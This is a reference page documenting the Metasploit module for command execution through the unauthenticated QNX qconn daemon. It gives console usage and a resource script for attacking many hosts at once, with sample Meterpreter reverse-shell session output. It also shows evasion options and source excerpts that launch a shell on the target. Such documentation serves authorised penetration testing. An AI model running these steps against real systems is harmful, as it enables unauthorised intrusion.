QNX qconn Command Execution - Metasploit


This page contains detailed information about how to use the exploit/qnx/qconn/qconn_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: QNX qconn Command Execution
Module: exploit/qnx/qconn/qconn_exec
Source code: modules/exploits/qnx/qconn/qconn_exec.rb
Disclosure date: 2012-09-04
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): 8000
List of CVEs: -

This module uses the qconn daemon on QNX systems to gain a shell. The QNX qconn daemon does not require authentication and allows remote users to execute arbitrary operating system commands. This module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using qconn_exec against a single host

Normally, you can use exploit/qnx/qconn/qconn_exec this way:

msf > use exploit/qnx/qconn/qconn_exec
msf exploit(qconn_exec) > show targets
    ... a list of targets ...
msf exploit(qconn_exec) > set TARGET target-id
msf exploit(qconn_exec) > show options
    ... show and set options ...
msf exploit(qconn_exec) > exploit

Using qconn_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your qconn_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/qnx/qconn/qconn_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the qnx/qconn/qconn_exec exploit module looks in the msfconsole:

msf6 > use exploit/qnx/qconn/qconn_exec

[*] Using configured payload cmd/unix/interact
msf6 exploit(qnx/qconn/qconn_exec) > show info

       Name: QNX qconn Command Execution
     Module: exploit/qnx/qconn/qconn_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-09-04

Provided by:
  David Odell
  Mor!p3r
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   8000             yes       The target port (TCP)
  SHELL   /bin/sh          yes       Path to system shell

Payload information:
  Avoid: 0 characters

Description:
  This module uses the qconn daemon on QNX systems to gain a shell. 
  The QNX qconn daemon does not require authentication and allows 
  remote users to execute arbitrary operating system commands. This 
  module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 
  6.5.0 SP1 (x86).

References:
  https://www.exploit-db.com/exploits/21520
  https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos
  http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html
  http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html

Module Options


This is a complete list of options available in the qnx/qconn/qconn_exec exploit:

msf6 exploit(qnx/qconn/qconn_exec) > show options

Module options (exploit/qnx/qconn/qconn_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   8000             yes       The target port (TCP)
   SHELL   /bin/sh          yes       Path to system shell

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the qnx/qconn/qconn_exec exploit:

msf6 exploit(qnx/qconn/qconn_exec) > show advanced

Module advanced options (exploit/qnx/qconn/qconn_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/interact):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the qnx/qconn/qconn_exec module can exploit:

msf6 exploit(qnx/qconn/qconn_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the qnx/qconn/qconn_exec exploit:

msf6 exploit(qnx/qconn/qconn_exec) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

Evasion Options


Here is the full list of possible evasion options supported by the qnx/qconn/qconn_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(qnx/qconn/qconn_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

67:	
68:	    connect
69:	    res = sock.get_once(-1, 10)
70:	
71:	    unless res
72:	      vprint_error 'Connection failed'
73:	      return CheckCode::Unknown
74:	    end
75:	
76:	    unless res.include? 'QCONN'
77:	      return CheckCode::Safe

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

104:	    CheckCode::Vulnerable
105:	  end
106:	
107:	  def exploit
108:	    unless check == CheckCode::Vulnerable
109:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
110:	    end
111:	
112:	    connect
113:	    res = sock.get_once(-1, 10)
114:	

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

111:	
112:	    connect
113:	    res = sock.get_once(-1, 10)
114:	
115:	    unless res
116:	      fail_with Failure::Unreachable, 'Connection failed'
117:	    end
118:	
119:	    unless res.include? 'QCONN'
120:	      fail_with Failure::UnexpectedReply, 'Unexpected reply'
121:	    end

Unexpected reply


Here is a relevant code snippet related to the "Unexpected reply" error message:

115:	    unless res
116:	      fail_with Failure::Unreachable, 'Connection failed'
117:	    end
118:	
119:	    unless res.include? 'QCONN'
120:	      fail_with Failure::UnexpectedReply, 'Unexpected reply'
121:	    end
122:	
123:	    sock.put "service launcher\n"
124:	    res = sock.get_once(-1, 10)
125:	

Unexpected reply


Here is a relevant code snippet related to the "Unexpected reply" error message:

122:	
123:	    sock.put "service launcher\n"
124:	    res = sock.get_once(-1, 10)
125:	
126:	    if res.nil? || !res.include?('OK')
127:	      fail_with Failure::UnexpectedReply, 'Unexpected reply'
128:	    end
129:	
130:	    print_status 'Sending payload...'
131:	    sock.put "start/flags run #{datastore['SHELL']} -\n"
132:	

Unexpected reply


Here is a relevant code snippet related to the "Unexpected reply" error message:

131:	    sock.put "start/flags run #{datastore['SHELL']} -\n"
132:	
133:	    Rex.sleep 1
134:	
135:	    unless negotiate_shell sock
136:	      fail_with Failure::UnexpectedReply, 'Unexpected reply'
137:	    end
138:	
139:	    print_good 'Payload sent successfully'
140:	
141:	    handler

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • David Odell
  • Mor!p3r
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.